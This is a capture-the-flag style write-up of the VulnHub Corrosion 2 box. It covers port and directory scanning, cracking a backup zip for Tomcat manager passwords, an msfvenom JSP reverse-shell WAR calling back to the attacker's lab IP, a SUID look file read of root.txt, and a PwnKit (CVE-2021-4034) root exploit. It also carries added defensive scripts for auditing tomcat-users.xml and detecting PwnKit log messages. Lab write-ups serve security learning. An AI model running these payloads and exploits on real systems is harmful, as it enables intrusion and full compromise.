Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 15:26 CST
Nmap scan report for 192.168.56.140
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:50:6A:48 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 15:27 CST
Nmap scan report for 192.168.56.140
Host is up (0.00036s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
| 256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_ 256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache Tomcat 9.0.53
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.53
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:50:6A:48 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.49 seconds

Getshell

Port 80 is just an ordinary Apache default page, and directory scanning turned up nothing else.

Port 8080 is a Tomcat instance. I tried some of the usual default enumeration with no result, so I scanned for directories:

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ gobuster dir -u http://192.168.56.140:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .jsp,war,txt,zip,rar,pdf,sql,zip,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.140:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,jsp,war,txt,zip,rar,pdf,sql
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.jsp (Status: 200) [Size: 11136]
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/backup.zip (Status: 200) [Size: 33723]
/readme.txt (Status: 200) [Size: 153]
/manager (Status: 302) [Size: 0] [--> /manager/]

There is a readme.txt and a backup.zip.

From the readme I learned that the username is randy. backup.zip looks like the Tomcat configuration files, but extracting it requires a password, which can be brute-forced:

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip


PASSWORD FOUND!!!!: pw == @administrator_hi5

In tomcat-users.xml we can find the users and passwords:

<user username="manager" password="melehifokivai" roles="manager-gui"/>

<role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>

So after logging in to the manager, generate a WAR package, deploy it and catch the reverse shell:

┌──(mikannse㉿kali)-[~/vulnhub/Corrosion2]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.131 LPORT=443 -f war -o revshell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes
Saved as: revshell.war
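From the defender's side, an added example that is not part of the original writeup: a small audit that parses a tomcat-users.xml like the one recovered above and flags accounts holding WAR-deployment or admin roles, as well as the same password reused across accounts (the probe account and the namespace wrapper are constructed for the sample).

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample modelled on the tomcat-users.xml from backup.zip above;
# the "probe" account is invented to show a non-privileged user
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="manager" password="melehifokivai" roles="manager-gui"/>
  <user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
  <user username="probe" password="s0meOtherPass" roles="probe"/>
</tomcat-users>
"""

# Roles that allow deploying arbitrary WARs (code execution as the Tomcat user)
# or administering the server through the host-manager application
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}


def _local(tag):
    """Strip the XML namespace so <user> matches with or without an xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return sorted (username, finding, detail) tuples for risky accounts."""
    root = ET.fromstring(xml_text)
    findings = []
    by_password = defaultdict(list)
    for elem in root.iter():
        if _local(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or "?"
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if privileged:
            findings.append((name, "privileged-role", ",".join(sorted(privileged))))
        if elem.get("password"):
            by_password[elem.get("password")].append(name)
    # One secret on several accounts: a single leaked backup compromises all of them
    for names in by_password.values():
        for name in names:
            others = sorted(n for n in names if n != name)
            if others:
                findings.append((name, "shared-password", "also used by " + ",".join(others)))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding, detail in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user:10s} {finding:18s} {detail}")
```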

Privilege escalation

Once on the box I found that the earlier password also works for the jaye user. In its Files directory there is a look binary with the SUID bit set, which gives arbitrary file read:

$ ./look '' "/root/root.txt"
2fdbf8d4f894292361d6c72c8e833a4b

But we still need to try to get root. With only an arbitrary file read we cannot read any SSH keys, because there simply aren't any.

On randy's desktop there is also a note and a Python script, but they are of no use.

However, while enumerating processes I noticed the polkit service again. The CVE-2021-3560 PoC from the previous box got nowhere, so I tried https://github.com/berdav/CVE-2021-4034.

After downloading it, compile it on Kali:

┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

Then zip up the whole directory and upload it.

When run, however, it fails with: version `GLIBC_2.34' not found (required by ./pwned)

It needs to be compiled by hand on Kali, statically linked so it does not depend on the target's glibc:

┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ gcc -Wall --shared -fPIC -o pwnkit.so pwnkit.c

┌──(mikannse㉿kali)-[~/tools/Privesc/linux/CVE-2021-4034]
└─$ gcc -Wall cve-2021-4034.c -o cve-2021-4034 -static

Then package and upload it again:

┌──(mikannse㉿kali)-[~/tools/Privesc/linux]
└─$ zip -r 4034.zip CVE-2021-4034

Unzip it on the target and run:

$ echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
$ mkdir -p GCONV_PATH=.
$ cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
$ chmod +x cve-2021-4034

After running it, privilege escalation succeeds:

$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),1002(jaye)

Looking into it, though, even though this is the same service as in the previous room and the CVE numbers are close, the underlying principle is different.

The details can be found at https://nvd.nist.gov/vuln/detail/cve-2021-4034. This kernel privilege escalation seems to be about as well known as Dirty COW.
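On the detection side, an added example that is not from the writeup or from the exploit repository: pkexec writes to syslog when its environment sanitisation rejects a value, and the Qualys advisory for CVE-2021-4034 notes that exploitation leaves exactly those two messages in the auth log. The script below scans auth.log-style lines for them; the sample lines are constructed, not captured from this box, and the patterns are deliberately tolerant of the upstream spelling of "suscipious".

```python
import re

# Constructed sample auth.log lines (not captured from the box). Lines 2 and 3 carry the
# two messages pkexec emits via syslog when it rejects SHELL or an environment variable.
SAMPLE_AUTH_LOG = """\
Oct  3 16:01:12 corrosion sshd[1402]: Accepted password for jaye from 192.168.56.131 port 50122 ssh2
Oct  3 16:05:40 corrosion pkexec[1533]: jaye: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/home/jaye/CVE-2021-4034] [COMMAND=]
Oct  3 16:05:41 corrosion pkexec[1534]: jaye: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=unknown] [CWD=/home/jaye] [COMMAND=]
Oct  3 16:07:02 corrosion pkexec[1601]: randy: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/randy] [COMMAND=/usr/bin/apt update]
"""

# syslog prefix as written by rsyslog: "<ts> <host> pkexec[<pid>]: <user>: <message>"
PKEXEC_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) pkexec\[(?P<pid>\d+)\]: (?P<user>[^:]+): (?P<msg>.*)$"
)

# Spelling-tolerant: matches both "suscipious" (polkit source) and "suspicious"
INDICATORS = [
    ("shell-not-in-etc-shells", re.compile(r"SHELL variable was not found")),
    ("env-var-rejected", re.compile(r"environment variable \S+ contains \w+ content")),
]


def find_pwnkit_indicators(log_text):
    """Return one dict per pkexec log line that matches a PwnKit exploitation message."""
    hits = []
    for line in log_text.splitlines():
        m = PKEXEC_LINE.match(line)
        if not m:
            continue
        reasons = [name for name, pat in INDICATORS if pat.search(m["msg"])]
        if reasons:
            hits.append({"pid": int(m["pid"]), "user": m["user"].strip(),
                         "host": m["host"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_pwnkit_indicators(SAMPLE_AUTH_LOG):
        print(f"pkexec pid {hit['pid']} user {hit['user']}: {', '.join(hit['reasons'])}")
```

A hit on an unpatched host is worth treating as a successful root compromise rather than a failed attempt, since the message is logged just before the payload runs; the stopgap Qualys documented while waiting for the polkit fix was removing the SUID bit from pkexec.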

Random thoughts

A standard Tomcat box followed by a kernel privilege escalation. I had actually run into this a few times before but never looked at how it works; these two boxes gave me a chance to understand it a little. This room has another path too: use look to read /etc/shadow and crack it locally, but I cracked for a long time with no result, and judging from the walkthrough it seems to take quite a while. After that, there is hijacking the base64 library file used by the Python script.